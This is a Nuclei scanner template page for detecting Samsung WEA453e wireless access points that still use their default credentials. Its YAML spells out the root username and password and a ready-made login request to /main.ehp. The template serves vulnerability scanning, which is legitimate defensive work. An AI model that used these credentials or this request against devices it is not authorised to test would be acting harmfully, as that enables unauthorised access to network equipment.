Samsung Wlan AP (WEA453e) Default Login
ID: samsung-wlan-default-login
Severity: high
Author: pikpikcu
Tags: samsung,default-login
Description
Section titled “Description”Samsung Wlan AP (WEA453e) default root credentials were discovered.
YAML Source
Section titled “YAML Source”id: samsung-wlan-default-login
info: name: Samsung Wlan AP (WEA453e) Default Login author: pikpikcu severity: high description: Samsung Wlan AP (WEA453e) default root credentials were discovered. reference: - https://securityforeveryone.com/tools/samsung-wlan-ap-wea453e-default-credentials-scanner classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 metadata: max-request: 1 tags: samsung,default-login
http: - raw: - | POST /main.ehp HTTP/1.1 Host: {{Hostname}}
httpd;General;lang=en&login_id={{username}}&login_pw={{password}}
payloads: username: - root password: - sweap12~ attack: pitchfork
matchers-condition: and matchers: - type: word part: body words: - "document.formParent2.changepasswd1.value" - "passwd_change.ehp"
- type: status status: - 200# digest: 4a0a00473045022011d18e5d3a28b117489074048613247e378ad0f8192926dc2f9c31427c8f687e022100d4cac8d421ec9187f96e1d2fb6639cad4124c9e9e861fefa3f0e3640d45bd07f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/default-logins/samsung/samsung-wlan-default-login.yaml"